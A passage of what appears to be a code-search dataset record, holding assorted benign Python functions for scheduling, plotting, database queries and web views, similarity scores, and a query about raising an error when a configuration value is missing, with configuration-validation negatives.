\"\\n\")", "def output_format(times_list):\n formatted_free_times = []\n for i in times_list:\n fmt_str = \"{} to {}.\".format(\n i[0].format('ddd, MMM D, h:mm a'),\n i[1].format('ddd, MMM D, h:mm a'))\n formatted_free_times.append(fmt_str)\n return formatted_free_times", "def overview():\n subjects = get_latest(10)\n return render_template('subject.html', subjects=subjects)", "def display_averaging(self):\r\n\r\n cwd = os.getcwd()\r\n path = cwd + \"/results\"\r\n df1 = pd.read_csv(path + \"/average_U.csv\") # black line\r\n df2 = pd.read_csv(path + \"/average_N.csv\") # green line\r\n chem = 25 # from 0 to 35\r\n\r\n s1 = df1.iloc[chem]\r\n s1.plot()\r\n\r\n plt.show()", "def top_students_table(course):\n\n return 'COURSE {}\\n'.format(course) + \\\n '\\n'.join('{:10} --- {:4}'.format(*rate)\n for rate in itertools.islice(get_rates(students_data(), course), 3))", "def display_all():\n results = artwork_db.get_all_artwork()\n for artist in results:\n print(artist)", "def show(self):\n i = 0\n print()\n for task in self.tasks:\n print(\"\\t\", i + 1, \". \", task.name, \"(\", task.priority, \")\")\n i += 1", "def plot_time_advances(self, path: str = None, methods: list = None, title=None):\n df = self.get_results(methods)\n ax = plt.axes()\n sns.lineplot(x='epoch', y='value', data=df, hue='statistics', style='method', ax=ax)\n plt.ylim(-31, 11)\n plt.ylabel('test statistics of log-lkl')\n lgd = plt.legend(loc='upper left', bbox_to_anchor=[1.01, -0.1, 0.2, 0.8], ncol=1)\n ax.set_position([0.1, 0.1, 0.75, 0.8])\n if title is not None:\n ax.set_title(title)\n if path is not None:\n for extension in ['eps', 'png']:\n plt.savefig(f'{path}.{extension}', format=extension)", "def display_hours(employee_id):\n\n if not g.user:\n flash(\"Please Login to continue.\", \"danger\")\n return redirect(\"/\")\n \n employee = Employee.query.get_or_404(employee_id)\n\n labels = json.dumps( [\"Completed\", \"Required\"])\n data = json.dumps([employee.completed, employee.required])\n \n return render_template(\"users/display_hours.html\", employee = employee, labels = labels, data = data)", "def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)", "def show_report(*args):\n for report in args:\n os.startfile(report)", "def PlotTimes(metadata, data):\n\n gp = Gnuplot.Gnuplot(persist=1)\n gp('set data style impulses')\n gp('set xtics 1')\n gp.clear()\n gp.xlabel('seconds')\n gp.ylabel('duration in second')\n gp.title(metadata.AsTitle())\n styles = {}\n line_style = 1\n\n for dataset in data:\n x = numpy.array(dataset.time, dtype='float_')\n if not dataset.name in styles:\n styles[dataset.name] = line_style\n line_style += 1\n d = Gnuplot.Data(x, dataset.data,\n title=dataset.name,\n with_='impulses ls %d' % styles[dataset.name])\n else: # no need to repeat a title that exists already.\n d = Gnuplot.Data(x, dataset.data,\n with_='impulses ls %d' % styles[dataset.name])\n\n gp.replot(d)\n gp.hardcopy('/tmp/%s-%s-%f.png' %\n (metadata.name, metadata.kernel, metadata.duration),\n terminal='png')", "def plot_stamps(stamps, fig=None, columns=3):\n num_stamps = len(stamps)\n num_rows = math.ceil(num_stamps / columns)\n\n # Create a new figure if needed.\n if fig is None:\n fig = plt.figure()\n\n for i in range(num_stamps):\n ax = fig.add_subplot(num_rows, columns, i + 1)\n ResultsVisualizer.plot_single_stamp(stamps[i], axes=ax)\n ax.set_title(f\"Time {i}\")", "def student_summary() -> str:\n db_path: str = \"810_startup.db\"\n\n try:\n db: sqlite3.Connection = sqlite3.connect(db_path)\n except sqlite3.OperationalError:\n return f'Error: Unable to open database at path {db_path}'\n else:\n query: str = \"select students.Name, students.CWID, grades.Course, grades.Grade, instructors.Name from students,grades,instructors where students.CWID=StudentCWID and InstructorCWID=instructors.CWID order by students.Name\"\n data: Dict[str, str] = [{'Name': name, 'CWID': cwid, 'Course': course, 'Grade': grade, 'Instructor': instructor} for name, cwid, course, grade, instructor in db.execute(query)]\n\n db.close()\n\n return render_template(\n 'students.html',\n title = 'Stevens Repository',\n table_title = 'Students Summary',\n students = data)", "def printSchedule(self):\n\t\tself.printWaiting()\n\t\tprint ' '.join(map(format,range(20),['2' for _ in range(20)]))\n\t\tprint \"\"", "def list_snapshots(args):\n html_doc = document.Document(get_code(args.file))\n edition, region, snapshots = html_doc.list(date=args.edition, region=args.region)\n print('Snapshots for {:s} {:%B %d, %Y}'.format(region.capitalize(), edition))\n for i in range(len(snapshots)):\n print('({:2d}) {!r:} -'.format(i, snapshots[i][1]) +\n ' {0:%B} {0.day:2}, {0:%Y %l:%M:%S.%f %p}'.format(snapshots[i][0]))", "def required_slots(tracker: Tracker) -> List[Text]:\n return [\n \"sucursal\",\n \"fecha_hora\"\n ]", "def print_event(self):\n\n list_of_names = [str(c) for c in self.__list_of_contacts]\n joined_names = ', '.join(list_of_names)\n table = [[str(self._title)],[\"Date: \"+str(self._date)],[\"Time: \"+str(self._start)+\" - \"+str(self._end)],[\"Participants: \"+str(joined_names)]]\n print(tabulate(table, tablefmt='grid'))", "def import_sat(filenames):\n\t# import SAT scores for each grade\n\t# l = []\n\t# for file in filenames:\n\t# \tdf = pd.read_excel(file, skiprows=9, usecols=['Student ID', 'Total Score', 'ERW', 'Math'])\n\t# \t# drop students with missing IDs\n\t# \tdf.dropna(inplace=True)\n\t# \t# make ID an integer and index\n\t# \tdf['Student ID'] = df['Student ID'].apply(lambda x: int(x))\n\t# \t# rename columns \t\t\n\t# \tdf = df.rename(index=int, columns={'Student ID':'ID', 'Total Score':'composite_sat', \n\t# \t\t\t\t\t'Math':'math_sat', 'ERW':'erw_sat'})\n\t# \t# index by ID\n\t# \tdf.set_index('ID')\n\t# \tl.append(df)\n\n\t# nine, ten, eleven = l\n\t# sat_df = nine.append([ten, eleven])\n\t# sat_df = sat_df.set_index('ID')\n\n\t# return sat_df\n\n\t# EDIT FOR NEW SAT SCORES #\n\tl = []\n\tfor file in filenames:\n\t\tdf = pd.read_excel(file, skiprows=9, usecols=['Student ID', 'Total Score', 'ERW', 'Math'])\n\t\t# drop students with missing IDs\n\t\tdf.dropna(inplace=True)\n\t\t# make ID an integer and index\n\t\tdf['Student ID'] = df['Student ID'].apply(lambda x: int(x))\n\t\t# rename columns \t\t\n\t\tdf = df.rename(index=int, columns={'Student ID':'ID', 'Total Score':'composite_sat', \n\t\t\t\t\t\t'Math':'math_sat', 'ERW':'erw_sat'})\n\t\t# index by ID\n\t\tdf.set_index('ID')\n\t\t# fill each column with temporary info\n\t\tdf['composite_sat'] = 'Scores coming in mid-May'\n\t\tdf['math_sat'] = 'Scores coming in mid-May'\n\t\tdf['erw_sat'] = 'Scores coming in mid-May'\n\t\tl.append(df)\n\n\tnine, ten, eleven = l\n\tsat_df = nine.append([ten, eleven])\n\tsat_df = sat_df.set_index('ID')\n\n\treturn sat_df", "def create_timeslots_at_interval():\n LOGGER.info(\"refreshing the timeslots\")\n timeslot_engine.generate_time_slots_from_range('9:00', '18:00')\n LOGGER.info(\"done refreshing the timeslots...\")", "def showAlerts(self):\n for string, ids in self.alerts.iteritems():\n idstring = ', '.join(ids)\n print(string, idstring)", "def leader_list():\n\n add_trainee_form = AddTraineeForm()\n return render_template(\n \"leaders_list.html\",\n add_trainee_form=add_trainee_form,\n title=\"Encadrants\",\n )", "def display_simple(self):\n print(\"\") \n print(\"Date: {}\".format(self.date))\n print(\" Task name: {}\".format(self.task_name))\n print(\" Time spent: {} minutes\".format(self.time_spent))\n print(\" Notes: {}\".format(self.notes))\n print(\" Task number: {}\".format(self.task_number))\n print(\"\")", "def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)", "def plotTime(self):\n plt.figure()\n t = [i for i in range(len(self.nodes_infected))]\n print(t)\n plt.title('Nodos infectados vs Tiempo')\n plt.xlabel('Instantes de tiempo')\n plt.ylabel('# de nodos infectados')\n plt.plot(t, self.nodes_infected)\n plt.grid(True)\n plt.show()", "def ttint(timelist,venue):\n #setup\n showturtle()\n #make python turtle graphics window 1260 pixels wide and 800 pixels tall\n setup(width = 1260, height = 800, startx = None, starty = None)\n reset()\n #text at top\n pen(pencolor=\"black\")\n pu()\n setpos(0,380)\n write(\"Welcome to your schedule. Use the arrow keys to toggle the day of the week\",move=False,align=\"center\",font=(\"Courier New\",10,\"normal\"))\n setpos(0,360)\n write(\"In Idle, type 'quit()' to exit turtle.\",move=False,align=\"center\",font=(\"Courier New\",10,\"normal\"))\n dayl = [\"Mon\",\"Tue\",\"Wed\",\"Thu\",\"Fri\",\"Sat\",\"Sun\"]\n setpos(0,-350)\n #writes venue at bottom of GUI\n write(venue,move=False,align=\"center\",font=(\"Courier New\",20,\"normal\"))\n #drawing the lines and timing\n #baseY = 300 because y = 300 is the height of the line for monday\n baseY = 300\n for ch in range(7):\n pu()\n #goes to relevant y position for respective day code\n setpos(-570,(baseY-(100*ch)))\n #writes day name at side\n write(dayl[ch],move=False,align=\"center\",font=(\"Courier New\",20,\"normal\"))\n pen(pencolor=\"black\",pensize=\"3\")\n #draws lines\n #for each hour\n for dh in range(19):\n #move right 60 steps\n setx(xcor()+60)\n pd()\n #move up 20 steps\n sety(ycor()+20)\n pu()\n #stop drawing. move up 10 steps and write hour\n sety(ycor()+10)\n write(str((600+(dh*100))),move=False,align=\"center\",font=(\"Courier New\",10,\"normal\"))\n #go back down 30 steps to main line\n sety(ycor()-30)\n #continue drawing\n pd()\n pu()\n #goes to each relevant timing to write module code\n #for every time range in timelist. dp stands for day parse\n for dp in range(len(timelist)):\n #if week day in timelist is not empty\n if len(timelist[dp]) >= 1:\n #for each timing in the week day. hp stands for hour parse\n for hp in range(1,len(timelist[dp])):\n #for each hour in the time range. pr is an arbitrary variable which helps to direct the turtle to the timings in between the start and end time to write the module code at the relevant location\n for pr in range(int((timelist[dp][hp][1]-timelist[dp][hp][0])/100)):\n #go to the relevant time and write the module code in between\n setpos((-840+(int(timelist[dp][hp][0]/100)+pr)*60),(410-timelist[dp][0]*100))\n write(timelist[dp][hp][2],move=False,align=\"center\",font=(\"Courier New\",8,\"normal\"))", "def index():\n groups = list(map(lambda x: x.json(), GroupModel.query.all())) \n return render_template('dashboard/schedules.html', groups=groups)", "def print_results():\n now_time = time.time()\n diff_time_in_sec = now_time - start_time\n generated_per_second = total / diff_time_in_sec\n generated_per_hour = 3600 * generated_per_second\n saved_per_second = success / diff_time_in_sec\n saved_per_hour = 3600 * saved_per_second\n\n os.system('cls' if os.name == 'nt' else 'clear')\n print(f\"{'Generated:' : <16}{total : <12}\")\n print(f\"{'New graphs:' : <16}{success : <12}\")\n print(f\"{'Success rate:' : <16}{round((success / total) * 100, 3) : <7} %\")\n print(f\"{'Speed:' : <16}{round(generated_per_hour) : <7} graphs/h\")\n print(f\"{'Save speed:' : <16}{round(saved_per_hour) : <7} graphs/h\")", "def list(self, option: str = \"\", short=False, **kwargs):\n courses = self.get_sorted_courses()\n\n if option == \"plain\":\n if short:\n for course in sorted(courses, key=lambda x: x.name + x.type):\n print(f\"{course.name} ({course.type})\")\n else:\n for course in sorted(courses, key=lambda x: x.abbreviation + x.type):\n print(f\"{course.abbreviation}-{course.type[0]}\")\n quit()\n\n current_day = datetime.today()\n current_weekday = current_day.weekday()\n\n # split to scheduled and non-scheduled\n unscheduled = [c for c in courses if c.time is None]\n courses = [c for c in courses if c not in unscheduled]\n\n table = []\n option = option.lower()\n\n for i, course in enumerate(courses):\n # lambda functions to test for various options\n # a is current weekday and b is the course's weekday\n options = {\n \"\": lambda _, __: True, # all of them\n \"t\": lambda a, b: a == b, # today\n \"tm\": lambda a, b: (a + 1) % 7 == b, # tomorrow\n \"mo\": lambda a, b: b == 0,\n \"tu\": lambda a, b: b == 1,\n \"we\": lambda a, b: b == 2,\n \"th\": lambda a, b: b == 3,\n \"fr\": lambda a, b: b == 4,\n \"sa\": lambda a, b: b == 5,\n \"su\": lambda a, b: b == 6,\n }\n\n if option not in options:\n exit_with_error(\"Invalid course-listing option!\")\n\n if options[option](current_weekday, course.weekday()):\n # include the name of the day before first day's course\n if courses[i - 1].time.day != courses[i].time.day:\n weekday = course.time.day.capitalize()\n\n # calculate the next occurrence\n date = (\n current_day\n + timedelta(days=(course.weekday() - current_weekday) % 7)\n ).strftime(\"%-d. %-m.\")\n\n table.append([f\"{weekday if not short else weekday[:3]} / {date}\"])\n\n # for possibly surrounding the name with chars if it's ongoing\n name_surround_char = \"•\" if course.is_ongoing() else \"\"\n\n row = [\n f\"{name_surround_char}{course.name if not short else course.abbreviation}{name_surround_char}\",\n f\"{minutes_to_HHMM(course.time.start)} -\"\n f\" {minutes_to_HHMM(course.time.end)}\"\n + (\n \"\"\n if course.time.weeks is None\n else (\n f\" ({course.time.weeks if not short else course.time.weeks[0]})\"\n )\n ),\n \"-\" if course.classroom is None else course.classroom.number,\n ]\n\n # color the course name the appropriate color, depending on its type\n row[0] = Ansi.color(row[0], course_types[course.type].color)\n\n # append useful information\n table.append(row)\n\n # list unscheduled courses only when no options are specified\n if option == \"\" and len(unscheduled) != 0:\n table.append([\"Unscheduled\"])\n for course in unscheduled:\n table.append(\n [\n course.name if not short else course.abbreviation,\n course.type[0],\n \"-\",\n \"-\",\n ]\n )\n\n if len(table) == 0:\n exit_with_error(\"No courses matching the criteria found!\")\n\n print_table(table)", "def list_aspects(request, pk):\n category = get_object_or_404(GradeCategory, pk=pk)\n aspects = GradeCategoryAspect.objects.filter(Category=category)\n ts = get_timeslot()\n return render(request, \"results/list_aspects.html\", {\n \"aspects\": aspects,\n 'ts': ts,\n 'cat': category,\n })", "def insert_time(self):\n if self.controller.shared_data.obj_track.size == 0:\n message = 'There is no loaded track to insert timestamp'\n messagebox.showwarning(title='Insert Time Assistant',\n message=message)\n return\n\n self.timestamp = dt.datetime(2000, 1, 1, 0, 0, 0)\n self.speed = 0\n\n spinbox_options = {'year': [1990, 2030, 2000],\n 'month': [1, 12, 1],\n 'day': [1, 31, 1],\n 'hour': [0, 23, 0],\n 'minute': [0, 59, 0],\n 'second': [0, 59, 0]}\n\n top = tk.Toplevel()\n top.title('Insert Time Assistant')\n\n # Insert data frame\n frm_form = tk.Frame(top, relief=tk.FLAT, borderwidth=3)\n frm_form.pack() # insert frame to use grid on it\n spn_time = collections.defaultdict()\n\n for i, entry in enumerate(spinbox_options):\n # This allow resize the window\n top.columnconfigure(i, weight=1, minsize=75)\n top.rowconfigure(i, weight=1, minsize=50)\n\n # Create widgets\n var = tk.StringVar(top)\n var.set(spinbox_options[entry][2])\n\n spn_time[entry] = tk.Spinbox(from_=spinbox_options[entry][0],\n to=spinbox_options[entry][1],\n master=frm_form,\n width=8,\n textvariable=var,\n justify=tk.RIGHT,\n relief=tk.FLAT)\n\n lbl_label = tk.Label(master=frm_form, text=f'{entry}', anchor='w')\n\n # Grid\n lbl_label.grid(row=i, column=0) # grid attached to frame\n spn_time[entry].grid(row=i, column=1)\n\n # Insert speed\n i = len(spn_time)\n top.columnconfigure(i, weight=1, minsize=75)\n top.rowconfigure(i, weight=1, minsize=50)\n spn_speed = tk.Spinbox(from_=0, to=2000,\n master=frm_form,\n width=8,\n justify=tk.RIGHT,\n relief=tk.FLAT)\n lbl_label = tk.Label(master=frm_form, text='speed (km/h)', anchor='w')\n lbl_label.grid(row=i, column=0, pady=10)\n spn_speed.grid(row=i, column=1)\n\n def _insert_timestamp():\n # Check input data and insert timestamp\n try:\n self.timestamp = dt.datetime(int(spn_time['year'].get()),\n int(spn_time['month'].get()),\n int(spn_time['day'].get()),\n int(spn_time['hour'].get()),\n int(spn_time['minute'].get()),\n int(spn_time['second'].get()))\n self.speed = float(spn_speed.get())\n if self.speed <= 0:\n raise ValueError('Speed must be a positive number.')\n\n # Insert timestamp\n self.controller.shared_data.obj_track.\\\n insert_timestamp(self.timestamp, self.speed)\n top.destroy()\n\n except (ValueError, OverflowError) as e:\n messagebox.showerror('Input Error', e)\n\n def _clear_box():\n for s in spn_time:\n spn_time[s].delete(0, 8)\n spn_time[s].insert(0, spinbox_options[s][2])\n spn_speed.delete(0, 8)\n spn_speed.insert(0, 0)\n\n # Button frame\n frm_button = tk.Frame(top)\n frm_button.pack(fill=tk.X, padx=5,\n pady=5) # fill in horizontal direction\n\n btn_clear = tk.Button(master=frm_button, text='Clear',\n command=_clear_box)\n btn_submit = tk.Button(master=frm_button, text='Submit',\n command=_insert_timestamp)\n btn_clear.pack(side=tk.RIGHT, padx=10)\n btn_submit.pack(side=tk.RIGHT, padx=10)" ]
[ "0.5666389", "0.5338114", "0.5279143", "0.51949066", "0.51755744", "0.51437485", "0.51287425", "0.51153266", "0.51038504", "0.5092183", "0.5066873", "0.504833", "0.5036777", "0.5032361", "0.50242746", "0.5023967", "0.50215155", "0.4967114", "0.496651", "0.49573854", "0.4937227", "0.49314487", "0.49239922", "0.48797157", "0.48743242", "0.48378047", "0.4830392", "0.48237115", "0.48199943", "0.48095345", "0.480702", "0.4800872", "0.47956583", "0.47729596", "0.47685894", "0.47685385", "0.47651872", "0.47579458", "0.47464067", "0.47419292", "0.47407645", "0.4739984", "0.47211984", "0.47001803", "0.46992368", "0.46941218", "0.46940178", "0.46743628", "0.4640633", "0.4640237", "0.46379346", "0.46376356", "0.4631618", "0.46304545", "0.46170205", "0.46138337", "0.46117362", "0.4609494", "0.46093804", "0.46093804", "0.46093804", "0.46082044", "0.4606311", "0.46058935", "0.4600324", "0.4597141", "0.45864072", "0.45817745", "0.4580489", "0.45788524", "0.4575756", "0.45744997", "0.45719805", "0.45707735", "0.4568935", "0.4566536", "0.45646912", "0.45565715", "0.45496482", "0.4543455", "0.4541122", "0.45243725", "0.4516492", "0.45047662", "0.45016852", "0.44963232", "0.44961593", "0.44925848", "0.44908547", "0.4488033", "0.44877476", "0.44871035", "0.4486304", "0.44844106", "0.4482715", "0.44817835", "0.448072", "0.44748625", "0.44745156", "0.4473694", "0.44685072" ]
0.0
-1
Error thrown when formatting a string but a config value is missing.
def __init__(self, key, parent=None): if parent: msg = f"Missing config while rendering {parent}: {key}" else: msg = f"Missing config: {key}" super(MissingConfiguration, self).__init__(msg)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _raise_format_error(self, name: str, format_str: str, source_format: str):\n\n raise ValueError(f\"The '{ name }' should be { format_str }, rather than { source_format }\")", "def test_single_specifier_missing(self):\n template = 'missing'\n value_count = 1\n msg = 'The formatter should contain one \"{}\" specifier.'\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def raiser(string):\n raise Exception(f'Please check your config.json file, {string} is missed or wrong.')", "def test_config_from_text_malformed_content():\n config_text = \"Malformed content inside config text\"\n with pytest.raises(Exception):\n Config(text=config_text)", "def get_formatted_string(self, input_string):\n if isinstance(input_string, str):\n try:\n return self.get_processed_string(input_string)\n except KeyError as err:\n # Wrapping the KeyError into a less cryptic error for end-user\n # friendliness\n missing_key = err.args[0]\n raise KeyNotInContextError(\n f'Unable to format \\'{input_string}\\' with '\n f'{{{missing_key}}}, because '\n f'context[\\'{missing_key}\\'] doesn\\'t exist') from err\n else:\n raise TypeError(f\"can only format on strings. {input_string} is a \"\n f\"{type(input_string)} instead.\")", "def _raise_value_error(self, option, typestring, value):\n qual = option._qualified_name()\n if qual[0] == 'trac.ini':\n raise ConfigurationError(\n _('trac.ini [%(sec)s] %(opt)s = \"%(val)s\": invalid %(type)s',\n sec=self.section, opt=qual[1],\n type=typestring, val=repr(value)))\n if qual[0] == 'macroarg':\n raise ValueError(\n _('macro argument %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))\n if qual[0] == 'default':\n raise TracError(\n _('plugin default %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))", "def test_init_with_format_str_and_header_True_raises_error(self):\n with pytest.raises(ValueError):\n _ = CSVFormatter(fmt_str=\"\", header=True)", "def test_incorrect_format_1(self):\n changelog = changelog_temp.format(\n before_changelog=\"## [Not yet released]\\n\\n### Added\\n\\n- Added a new feature\\n\"\n )\n with pytest.raises(ValueError):\n parse_changelog(changelog)", "def test_invalid_config_cli_param(self):\n\n self.render_config_template(\n console={\"pretty\": \"false\"}\n )\n\n # first run with default config, validating config being\n # actually correct.\n proc = self.start_beat()\n self.wait_until(lambda: self.log_contains(\"mockbeat start running.\"))\n proc.check_kill_and_wait()\n\n # start beat with invalid config setting on command line\n exit_code = self.run_beat(\n extra_args=[\"-d\", \"config\", \"-E\", \"output.console=invalid\"])\n\n assert exit_code == 1\n assert self.log_contains(\"error unpacking config data\") is True", "def validate_input_string(self):\n invalid_string = \"\"\n try:\n for key in self.module.params:\n val = self.module.params[key]\n if key == \"description\" or key == \"snap_schedule_name\" \\\n or key == \"snap_schedule_id\":\n continue\n if isinstance(val, str) \\\n and val == invalid_string:\n errmsg = 'Invalid input parameter \"\" for {0}'.format(\n key)\n self.module.fail_json(msg=errmsg)\n\n except Exception as e:\n errormsg = \"Failed to validate the module param with \" \\\n \"error {0}\".format(str(e))\n LOG.error(errormsg)\n self.module.fail_json(msg=errormsg)", "def test_string_format():\n tree = parse(dedent(\"\"\"\\\n import logging\n\n logging.info(\"Hello {}\".format(\"World!\"))\n \"\"\"))\n visitor = LoggingVisitor()\n visitor.visit(tree)\n\n assert_that(visitor.violations, has_length(1))\n assert_that(visitor.violations[0][1], is_(equal_to(STRING_FORMAT_VIOLATION)))", "def _validate_string(display_name, input_value):\n\n if not isinstance(input_value, str):\n raise ValueError(display_name + \" must be a string type\")\n if input_value == '':\n raise ValueError(display_name + \" cannot be empty\")", "def _raise_error_with_context(context):\n context_str = \" \"\n for c in context:\n if isinstance(c, str):\n context_str = context_str + f\"in key {c} \"\n elif isinstance(c, int):\n context_str = context_str + f\"in index {c} \"\n raise ValueError(f\"Value{context_str}is required\")", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def test_configurations_create_invalid_value_type(self):\n values = '{\"key_buffer_size\": \"this is a string not int\"}'\n assert_unprocessable(instance_info.dbaas.configurations.create,\n CONFIG_NAME, values, CONFIG_DESC)", "def _validate_input_string(display_name, value):\n\n if value is None:\n raise ValueError(display_name + \" cannot be undefined.\")\n\n if value == \"\":\n raise ValueError(display_name + \" cannot be empty.\")", "def parseError(message):\n print(\"config error in \" + config_file + \": \" + message, file=sys.stderr)", "def test_single_specifier_needed(self):\n template = '{0} one too many {1}'\n value_count = 1\n msg = ('The formatter should only contain one '\n '\"{}\" specifier for the source field.')\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def test_empty(self):\n self.assertRaises(ParseException, self.flag.parseString, '')", "def test_tap_config_raise_exception_if_invalid_config_yet_after_retries(self):\n self._assert_raise_exception_on_invalid_file_content(\n test_case_invalid='config',\n invalid_file_contents=('', ' ', 'foo', '{\"foo\": 1')\n )", "def _checkSSFormatArg(ssformat):\n if ssformat == '':\n raise ShortStrException('ssformat argument cannot be the empty string')\n\n if not isinstance(ssformat, str):\n raise ShortStrException('ssformat argument must be a string with only characters *, c, l, u, and d')\n\n for c in ssformat:\n if c not in '*clud':\n raise ShortStrException('ssformat argument must be a string with only characters *, c, l, u, and d')", "def test_mult_specifiers_missing(self):\n template = '{0} too few {1}'\n value_count = 3\n msg = ('The formatter contains too few \"{}\" '\n 'specifiers for the number of source fields.')\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def test_configure_non_interactive_missing_field_value(ExampleComponentClass):\n\n with pytest.raises(\n ValueError,\n match=r\"^No configuration value found for annotated field 'FAKE_NAME.a' of type 'int'.\",\n ):\n configure(ExampleComponentClass(), {\"b\": \"bar\"}, name=\"FAKE_NAME\")", "def test_docker_args_invalid(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n docker_args: 666\n \"\"\"\n )\n\n self._invalid_config(\"must be a string\")", "def test_running_with_badly_formatted_config():\n cli_result = subprocess.run(\n ['kaiba', 'tests/files/bad_config.json', 'tests/files/input.json'],\n capture_output=True,\n )\n assert b\"'target' is a required property\" in cli_result.stderr", "def _validate_format(self, full_encrypted_value, **options):\n\n if not self.FORMAT_REGEX.match(full_encrypted_value):\n raise InvalidEncryptedValueError('Input value is not a valid '\n '[{current}] encryption value.'\n .format(current=self._get_algorithm()))", "def test_entrypoint_invalid(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n entrypoint: 666\n \"\"\"\n )\n\n self._invalid_config(\"must be a string\")", "def Invalid(\r\n self, s: str = \"\", e: Type[BaseException] = None, fail: bool = False\r\n ) -> None:\r\n ...", "def test_no_template(self):\n template = ''\n value_count = 2\n msg = 'No template has been provided for formatting multiple fields.'\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def test_invalid_config() -> None:\n config = {\"statsd\": {\"host1\": \"host1\"}}\n\n with pytest.raises(vol.Invalid):\n statsd.CONFIG_SCHEMA(None)\n with pytest.raises(vol.Invalid):\n statsd.CONFIG_SCHEMA(config)", "def __string(input_string, name=\"\", internal=False):\n if input_string is None:\n __ex(\"The %s is missing.\" % name, internal)\n if input_string == \"\":\n __ex(\"The %s must not be empty.\" % name, internal)", "def test_allow_unknown():\n template = 'name=\"{name}\" value=\"{value}\"'\n fmt = FormatTemplate(remove_unused=False)\n result = fmt(template)\n assert result == template", "def test_invalid_config_options_output():\n\n with pytest.raises(InputError):\n _check_input_config({\"unknown_key_1\": 1})", "def test_make_output_fail():\n with pytest.raises(ValueError):\n make_output_format('dummy_format', LOG_DIR)", "def _validate_value(value : Any) -> str:\n if isinstance(value, str):\n value = value.replace(\"'\", \"''\")\n return f'\"{value}\"'\n return f\"{value}\"", "def error_bad_value(user: discord.User, value_type: str, value: Any) -> str:\n return (\n f\"Hmmmm. {user.mention}, I'm having a hard time understanding the {value_type}\"\n f\" '{value}'.\"\n )", "def test_unsupported_format():\n formatter = TabularOutputFormatter()\n\n with pytest.raises(ValueError):\n formatter.format_name = \"foobar\"\n\n with pytest.raises(ValueError):\n formatter.format_output((), (), format_name=\"foobar\")", "def test_bad_config(self):\n # test a config with a missing particle classes dict\n config = {}\n stream_handle = open(os.path.join(RESOURCE_PATH,\n 'short_SNA_SNA.txt'), MODE_ASCII_READ)\n\n with self.assertRaises(ConfigurationException):\n self.parser = NutnrJCsppParser(config, stream_handle,\n self.exception_callback)\n\n # test a config with a missing data particle class key\n config = {\n DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {\n METADATA_PARTICLE_CLASS_KEY: NutnrJCsppMetadataTelemeteredDataParticle,\n }\n }\n\n with self.assertRaises(ConfigurationException):\n self.parser = NutnrJCsppParser(config, stream_handle,\n self.exception_callback)", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def test_readbadformat(self):\n\n self.assertRaises(ParseError, self.hw, self.badfile)", "def validate_format(self):\n raise NotImplementedError()", "def string_p(value):\n if type(value) is not str:\n raise Invalid(\"invalid value type {value}\".format(value=value))", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: D1Line(self.bad_line))", "def value_from_str(self, s):\n raise ValueError()", "def test_configurations_create_invalid_values(self):\n values = '{\"this_is_invalid\": 123}'\n try:\n instance_info.dbaas.configurations.create(\n CONFIG_NAME,\n values,\n CONFIG_DESC)\n except exceptions.UnprocessableEntity:\n resp, body = instance_info.dbaas.client.last_response\n assert_equal(resp.status, 422)", "def validate_string(s, name=''):\n assert (s is not None), name + ' settings should not be None'\n assert (isinstance(s, str)), name + ' settings should be a string'\n assert (s != ''), name + ' settings should be not be empty'", "def test_validate_failure_bad_config(self, value):\n sch = scheme.Scheme()\n with pytest.raises(errors.SchemeValidationError):\n sch.validate(value)", "def test_debug_string_format():\n tree = parse(dedent(\"\"\"\\\n import logging\n\n logging.debug(\"Hello {}\".format(\"World!\"))\n \"\"\"))\n visitor = LoggingVisitor()\n visitor.visit(tree)\n\n assert_that(visitor.violations, has_length(1))\n assert_that(visitor.violations[0][1], is_(equal_to(STRING_FORMAT_VIOLATION)))", "def command_error(fmt, *args, **kwargs):\n raise CommandError(fmt.format(*args, **kwargs))", "def _setter_error(self, msg, nval): # type: (str, Any) -> None\n logging.error('Cyra config value %s for field [%s] %s. Falling back to default value %s.'\n % (repr(nval), '.'.join(self._path), msg, repr(self._default)))", "def test_validate_aws_config():\n cfg = configparser.ConfigParser()\n cfg[CFG_BLAST] = {CFG_BLAST_PROGRAM: 'blastp',\n CFG_BLAST_RESULTS: 's3://test-results',\n CFG_BLAST_DB: 'test-db',\n CFG_BLAST_QUERY: 'test-queries'}\n\n 